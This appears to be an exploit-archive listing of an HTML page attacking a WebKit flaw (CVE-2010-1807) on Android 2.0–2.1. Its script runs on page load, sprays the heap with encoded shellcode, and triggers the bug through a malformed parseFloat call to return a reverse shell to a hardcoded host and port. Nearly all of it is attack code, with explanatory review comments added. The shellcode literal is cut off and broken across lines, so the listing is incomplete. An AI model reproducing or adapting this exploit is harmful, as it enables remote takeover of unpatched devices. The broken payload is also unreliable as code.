Android 2.0 / 2.1 Reverse Shell Exploit

Related Vulnerabilities: CVE-2010-1807  
Publish Date: 05 Nov 2010
Author: MJ Keith
                							

                <html>
<head>
<script>
// bug     = WebKit code execution, CVE-2010-1807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807
//           listed as a Safari bug but also works on Android :)
// tested  = Moto Droid 2.0.1, Moto Droid 2.1, emulator 2.0 - 2.1
// patched = Android 2.2
// author  = mj
// hardcoded to return a shell to 10.0.2.2 port 2222
// (10.0.2.2 is the Android emulator's alias for the development host's loopback interface)
//
// Trigger helper: appends a new <div> (held in the variable named `span`) to the
// element with id "pwn" and assigns `pop` to its innerHTML.
// The only caller on this page passes a Number, so the innerHTML assignment makes
// the engine convert that number to a string.
// NOTE(review): the header attributes the bug to WebKit (CVE-2010-1807); the
// engine-side fault is not visible in this listing, so treat the number-to-string
// conversion as the presumed point where the unpatched engine misbehaves.
function sploit(pop)
        {
        var span = document.createElement("div");
        document.getElementById("pwn").appendChild(span);
        // Assigning a non-string here is what forces the implicit conversion.
        span.innerHTML = pop;
        }
// Heap-preparation and trigger routine for this proof of concept.
// Steps visible below: build a payload string, double it until it is at least
// 0x1000 characters long, store 1000 references to it in the global array
// `target`, write every entry into the document, and on the final loop pass
// hand a negated parseFloat() result to sploit().
// NOTE(review): the payload literal on this page is cut off. It has no closing
// quote or parenthesis, and a line break falls in the middle of it, so the
// listing does not parse as shown. Treat it as an incomplete record of the
// original file.
// For triage, the distinctive pattern in this page is bulk duplication of one
// long string combined with parseFloat() on a non-standard "NAN(...)" argument.
// The header states the issue is patched in Android 2.2.
function heap()
        {      
        var scode = unescape("\u3c84057\u3c80057\u3c7c057\u3c78057\u3c74057\u3c70057\u3c6c057\u3c68057\u3c64057\u3c60057\u3c5c057\u3c58057\u3c54057\u3c50057\u3c4c057\u3c48057\u3c44057\u3c40057\u3c3c057\u3c38057\u3c34057\u3c30057\u3c2c057\u3c28057\u3c24057\u3c20057\u3c1c057\u3c18057\u3c14057\u3c10057\u3c0c057\u3c08057\u3c04057\u3bfc057\u3bfc057\u3bf8057\u3bf4057\u3bf0057\u3bec057\u3be8057\u3be4057\u3be0057\u3bdc057\u3bd8057\u3bd4057\u3bd0057\u3bcc057\u3bc8057\u3bc4057\u3bc0057\u3bbc057\u3bb8057\u3bb4057\u3bb0057\u3bac057\u3ba8057\u3ba4057\u3ba0057\u3b9c057\u3b98057\u3b94057\u3b90057\u3b8c057\u3b88057\u3b84057\u3b80057\u3b7c057\u3b78057\u3b74057\u3b70057\u3b6c057\u3b68057\u3b64057\u3b60057\u3b5c057\u3b58057\u3b54057\u3b50057\u3b4c057\u3b48057\u3b44057\u3b40057\u3b3c057\u3b38057\u3b34057\u3b30057\u3b2c057\u3b28057\u3b24057\u3b20057\u3b1c057\u3b18057\u3b14057\u3b10057\u3b0c057\u3b08057\u3b04057\u3afc057\u3afc057\u3af8057\u3af4057\u3af0057\u3aec057\u3ae8057\u3ae4057\u3ae0057\u3adc057\u3ad8057\u3ad4057\u3ad0057\u3acc057\u3ac8057\u3ac4057\u3ac0057\u3abc057\u3ab8057\u3ab4057\u3ab0057\u3aac057\u3aa8057\u3aa4057\u3aa0057\u3a9c057\u3a98057\u3a94057\u3a90057\u3a8c057\u3a88057\u3a84057\u3a80057\u3a7c057\u3a78057\u3a74057\u3a70057\u3a6c057\u3a68057\u3a64057\u3a60057\u3a5c057\u3a58057\u3a54057\u3a50057\u3a4c057\u3a48057\u3a44057\u3a40057\u3a3c057\u3a38057\u3a34057\u3a30057\u3a2c057\u3a28057\u3a24057\u3a20057\u3a1c057\u3a18057\u3a14057\u3a10057\u3a0c057\u3a08057\u3a04057\u39fc057\u39fc057\u39f8057\u39f4057\u39f0057\u39ec057\u39e8057\u39e4057\u39e0057\u39dc057\u39d8057\u39d4057\u39d0057\u39cc057\u39c8057\u39c4057\u39c0057\u39bc057\u39b8057\u39b4057\u39b0057\u39ac057\u39a8057\u39a4057\u39a0057\u399c057\u3998057\u3994057\u3990057\u398c057\u3988057\u3984057\u3980057\u397c057\u3978057\u3974057\u3970057\u396c057\u3968057\u3964057\u3960057\u395c057\u3958057\u3954057\u3950057\u394c057\u3948057\u3944057\u3940057\u393c057\u3938057\u3934057\u3930057\u392c057\u3928057\u3924057\u3920057\u391c05
7\u3918057\u3914057\u3910057\u390c057\u3908057\u3904057\u38fc057\u38fc057\u38f8057\u38f4057\u38f0057\u38ec057\u38e8057\u38e4057\u38e0057\u38dc057\u38d8057\u38d4057\u38d0057\u38cc057\u38c8057\u38c4057\u38c0057\u38bc057\u38b8057\u38b4057\u38b0057\u38ac057\u38a8057\u38a4057\u38a0057\u389c057\u3898057\u3894057\u3890057\u388c057\u3888057\u3884057\u3880057\u387c057\u3878057\u3874057\u3870057\u386c057\u3868057\u3864057\u3860057\u385c057\u3858057\u3854057\u3850057\u384c057\u3848057\u3844057\u3840057\u383c057\u3838057\u3834057\u3830057\u382c057\u3828057\u3824057\u3820057\u381c057\u3818057\u3814057\u3810057\u380c057\u3808057\u3804057\u37fc057\u37fc057\u37f8057\u37f4057\u37f0057\u37ec057\u37e8057\u37e4057\u37e0057\u37dc057\u37d8057\u37d4057\u37d0057\u37cc057\u37c8057\u37c4057\u37c0057\u37bc057\u37b8057\u37b4057\u37b0057\u37ac057\u37a8057\u37a4057\u37a0057\u379c057\u3798057\u3794057\u3790057\u378c057\u3788057\u3784057\u3780057\u377c057\u3778057\u3774057\u3770057\u376c057\u3768057\u3764057\u3760057\u375c057\u3758057\u3754057\u3750057\u374c057\u3748057\u3744057\u3740057\u373c
        // Repeated self-concatenation: stops once the string reaches 0x1000 characters.
        do {
          scode += scode;
        } while(scode.length < 0x1000);
        // `target` and `i` are assigned without `var`, so both become globals.
        target = new Array();
        // Fill indices 0..999 with the same large string.
        for(i = 0; i < 1000; i++)
           target[i] = scode;
        // Runs 1001 times (0..1000); the extra pass is the one that calls sploit().
        for (i = 0; i <= 1000; i++)
        {
                // True only on the last iteration (i == 1000).
                if (i>999)
        {
        // parseFloat() is given a non-standard "NAN(...)" string and the result is negated
        // before being passed on. NOTE(review): presumably this is the malformed
        // floating-point input the CVE concerns; confirm against the advisory.
        sploit(-parseFloat("NAN(ffffe00572c60)"));
        }
        // Writes each entry into the page; target[1000] was never set, so the
        // last write emits "undefined".
        document.write("The targets!! " + target[i]);
        document.write("<br />");
        }
}
</script>
</head>
<body id="pwn">
woot
<script>
// Called unconditionally from an inline script in <body>, so the routine runs
// as the page is parsed, with no user interaction.
heap();
</script>
</body>
</html>
